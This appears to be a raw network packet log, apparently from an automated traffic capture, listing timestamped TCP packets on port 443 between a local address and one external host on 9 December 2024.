                                                                                                                                                                          Dec 9, 2024 17:54:03.417689085 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.417725086 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.417741060 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.424381971 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.424400091 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.424463987 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.424480915 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.424654961 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.431389093 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.431406975 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.431473017 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.431493044 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.431540012 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.437684059 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.437690973 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.437771082 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.437787056 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.437932014 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.444601059 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.444622040 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.444674015 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.444693089 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.444721937 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.444741011 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.450601101 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.450618982 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.450680017 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.450695992 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.450721979 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.450740099 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.462224007 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.462254047 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.462305069 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.462321043 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.462361097 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.462372065 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.603383064 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.603413105 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.603480101 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.603513002 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.603535891 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.603559017 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.610104084 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.610132933 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.610177994 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.610187054 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.610234976 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.616978884 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.617006063 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.617089987 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.617096901 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.617134094 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.622888088 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.622922897 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.623007059 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.623028994 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.623179913 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.630131960 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.630156994 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.630198002 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.630220890 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.630240917 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.630260944 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.636140108 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.636168003 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.636220932 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.636241913 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.636260033 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.636276960 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.643008947 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.643038988 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.643095970 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.643111944 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.643136978 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.643157005 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.654416084 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.654443979 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.654486895 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.654509068 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.654562950 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.654695988 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.811098099 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.811125994 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.811156034 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.811172962 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.811182022 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.811244011 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.818069935 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.818095922 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.818151951 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.818172932 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.818214893 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.823965073 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.823992968 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.824043989 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.824057102 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.824083090 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.824099064 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.831130981 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.831161976 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.831211090 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.831228018 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.831248999 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.831269979 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.838318110 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.838346958 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.838376999 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.838387012 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.838417053 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.843940020 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.843965054 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.844002962 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.844017982 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.844039917 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.844063044 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.850831032 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.850861073 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.850923061 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.850941896 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.850984097 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.856822968 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.856852055 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.856931925 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.856947899 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:03.856976032 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:03.856997967 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.003623962 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.003654003 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.003711939 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.003739119 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.003766060 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.003789902 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.010325909 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.010351896 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.010389090 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.010395050 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.010454893 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.016221046 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.016246080 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.016329050 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.016334057 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.016387939 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.023098946 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.023123980 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.023171902 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.023176908 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.023231030 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.030457973 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.030481100 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.030529976 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.030551910 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.030570984 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.030596018 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.036351919 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.036380053 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.036427021 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.036451101 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.036469936 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.036489964 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.043082952 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.043112040 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.043154955 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.043163061 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.043200970 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.043224096 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.049124956 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.049154043 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.049201012 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.049206018 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.049247026 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.325830936 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.325845957 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.325871944 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.325928926 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.325942993 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.325965881 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.325970888 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.325979948 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.325993061 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.325999975 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.326132059 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.326138973 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.326214075 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.326232910 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.326235056 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.326245070 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.326257944 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.326297998 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.326307058 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.326322079 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.326370955 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.326374054 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.326405048 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.326422930 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.326426029 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.326431990 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.326502085 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.326502085 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.389585972 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.389607906 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.389657021 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.389673948 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.389708996 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.389725924 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.396810055 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.396833897 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.396874905 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.396883965 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.396929979 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.397012949 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.401415110 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.401439905 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.401489019 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.401494980 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.401520967 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.401532888 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.408057928 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.408077002 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.408118963 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.408128023 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.408184052 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.408184052 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.414870977 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.414891005 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.414946079 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.414952993 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.415067911 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.445249081 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.445271969 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.445365906 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.445384026 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.445444107 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.447329998 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.447352886 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.447427034 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.447432995 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.447500944 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.448183060 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.448203087 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.448249102 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.448254108 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.448275089 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.448352098 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.580476999 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.580503941 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.580557108 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.580569029 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.580621004 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.580743074 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.587595940 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.587613106 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.587675095 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.587680101 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.587843895 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.594201088 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.594213009 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.594275951 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.594280005 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.594544888 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.600195885 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.600213051 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.600263119 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.600266933 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.600327015 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.606978893 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.606995106 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.607058048 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.607062101 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.607250929 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.615989923 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.616007090 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.616066933 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.616070986 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.616295099 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.622148991 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.622165918 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.622461081 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.622464895 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.622631073 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.629378080 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.629483938 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.630352020 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.630419970 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.772912979 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.772939920 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.772979975 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.772993088 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.773046017 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.779810905 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.779827118 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.779951096 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.779956102 CET44349824107.167.96.30192.168.2.4
                                                                                                                                                                          Dec 9, 2024 17:54:04.780065060 CET49824443192.168.2.4107.167.96.30
                                                                                                                                                                          Dec 9, 2024 17:54:04.786916971 CET44349824107.167.96.30192.168.2.4
